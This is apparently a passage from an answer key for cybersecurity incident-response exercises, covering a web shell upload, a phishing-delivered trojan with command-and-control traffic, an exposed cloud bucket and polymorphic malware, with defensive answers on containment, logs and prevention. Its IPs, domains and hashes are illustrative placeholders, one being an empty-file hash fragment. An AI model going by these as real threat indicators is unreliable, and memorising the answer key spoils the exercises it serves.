7. How should the vulnerability be mitigated, considering no patch is available?

Answer: Disable the vulnerable file upload functionality temporarily and implement input
validation and sanitisation.

8. What proactive measures could have prevented this attack?

Answer:

• Implementing Web Application Firewall (WAF) rules to block malicious payloads.

 • Regularly scanning for vulnerabilities.
• Hardening the web server and restricting upload directories.

9. What logs provided evidence of the malicious activity?

Answer:

• Web server logs showed the malicious payload upload.

• File system logs confirmed the creation and execution of malicious_shell.php.
• SIEM alerts flagged suspicious file upload behavior.

10. What potential impact could this attack have if not contained?

Answer:

• Data theft or leakage.

• Compromise of other internal systems through lateral movement.
• Use of the server for further attacks, such as launching malware or phishing
campaigns.
SET 8

1. How did the attacker deliver the malicious payload?

Answer: The attacker delivered the payload via a spear-phishing email masquerading as a
trusted vendor update.

2. What file was executed by the target user and what was its hash?

Answer: The file update_security_patch.exe was executed, with the hash

e3b0c44298fc1c149afbf4c8996fb924.

3. What suspicious activity occurred on the workstation after the file execution?

Answer:

• Execution of an unauthorised PowerShell command.

• Communication with suspicious external IPs and a malicious domain (malicious-
c2[.]com).

4. What are the suspected Command-and-Control (C2) IPs?

Answer:

• 192.0.2.200
• 203.0.113.10

5. What immediate actions should be taken to contain the threat?

Answer:

• Isolate WORKSTATION-102 from the network.

• Block C2 IPs and domains in the firewall.
• Notify the vendor about the potential supply chain compromise.

6. What indicators suggest this was a supply chain attack?

Answer:

• The email appeared to originate from a trusted vendor

([email protected]).
• A legitimate-looking executable was attached but executed malicious commands.

7. How can the organisation validate the legitimacy of the vendor’s email?
Answer: By contacting the vendor through official channels and verifying the email’s
content and attachment.

8. What logs provided evidence of communication with malicious infrastructure?

Answer:

• Firewall logs showing HTTPS communication with external IPs.

• DNS query logs showing a resolution request for malicious-c2[.]com.

9. What proactive defenses could mitigate supply chain attacks in the future?

Answer:

• Implementing email filtering for suspicious attachments.

• Using endpoint protection with enhanced behavioral detection.
• Verifying all vendor communications and updates.

10. What steps should be taken to determine the scope of this compromise?

Answer:

• Analyse all logs for similar activities on other endpoints.

• Scan for the executable’s presence across the network.
• Check for additional outbound connections to known malicious C2 servers.
SET 9

1. What vulnerability allowed the attacker to access sensitive data?

Answer: A misconfigured cloud storage bucket (s3://sensitive-data-bucket/) was set to

public access, enabling anonymous users to list, access and modify files.

2. What actions did the attacker perform on the cloud bucket?

Answer:

• Downloaded a sensitive file (financial_report_2024.xlsx).

• Listed all contents of the bucket.
• Deleted backups from the backups/ folder.

3. What is the source IP of the attacker and why is it significant?

Answer: The attacker’s IP is 203.0.113.55, identified as a known threat actor in the threat
intelligence feed.

4. What was the first indication of the attack?

Answer: Logs showed anonymous access to the bucket with a successful GET request for
sensitive data.

5. What immediate steps should be taken to contain the attack?

Answer:

• Restrict public access to the bucket immediately.

• Revoke all anonymous access policies.
• Block the attacker’s IP address (203.0.113.55).

6. How could this misconfiguration have been prevented?

Answer:

• Implementing least-privilege access controls.

• Regularly auditing cloud storage permissions.
• Using automated tools to detect public buckets.

7. What additional risks does this incident pose?

Answer:
 • Exposure of sensitive financial data to unauthorised parties.
• Potential use of the data for extortion or fraud.
• Loss of critical backups, hindering recovery efforts.

8. What further investigation is needed after containment?

Answer:

• Review access logs for additional unauthorised activity.

• Identify other misconfigured resources in the cloud environment.
• Assess the extent of data leakage and possible recovery options.

9. What tools can be used to monitor cloud security more effectively?

Answer:

• AWS CloudTrail for detailed logging.

• SIEM integration with cloud services.
• Automated cloud security posture management tools like Prisma Cloud or AWS
Security Hub.

10. What policies should be implemented to prevent similar incidents?

Answer:

• Enforce encryption for all stored data.

• Require authentication for all cloud resources.
• Set up alerting for public access attempts and sensitive data movements.
SET 10

1. How was the malware delivered to the target?

Answer: The malware was delivered via a spear-phishing email containing an attachment
(performance_analysis_tool.exe).

2. What behavior was observed from the malware upon execution?

Answer: The malware exhibited AI-driven capabilities, including:

• Polymorphic behavior (hash changes).

• Identifying unprotected files for exfiltration.
• Evading antivirus detection in real-time.

3. What external IPs were involved in the data exfiltration and what are they
associated with?

Answer:

• 198.51.100.45
• 203.0.113.20 These are known Command-and-Control (C2) servers used in AI-
powered malware campaigns.

4. What is the hash of the original and polymorphic malware files?

Answer:

• Original: 8df48e58b0a1fcb99eabcd00112d34f7
• Polymorphic: 4a8b3f9c0ef12a67edbc34500d1f78de

5. What were the volumes of data exfiltrated to the C2 servers?

Answer:

• 198.51.100.45: 15,000 bytes sent.

• 203.0.113.20: 50,000 bytes sent.

6. What immediate containment steps should be taken?

Answer:

• Isolate WORKSTATION-305 from the network.

• Block communication with 198.51.100.45 and 203.0.113.20.
 • Perform memory analysis to identify and terminate the AI malware process.

7. What advanced defenses could mitigate AI-driven malware?

Answer:

• Use of AI-based endpoint protection solutions.

• Behavioral analytics tools to detect unusual patterns.
• Zero-trust network segmentation to limit data access.

8. What makes this attack particularly challenging to defend against?

Answer:

• Polymorphic capabilities of the malware.

• Use of AI to adapt and bypass traditional defenses.
• Stealthy data exfiltration using encrypted HTTPS.

9. How can the organisation improve its phishing defenses?

Answer:

• Implement advanced email filtering.

• Conduct regular phishing simulation training.
• Enable multi-factor authentication to reduce the impact of credential harvesting.

10. What follow-up investigations are necessary?

Answer:

• Analyse logs for similar malware activities across the network.

• Review email filters and employee awareness programs.
• Check for unauthorised access to critical systems and files.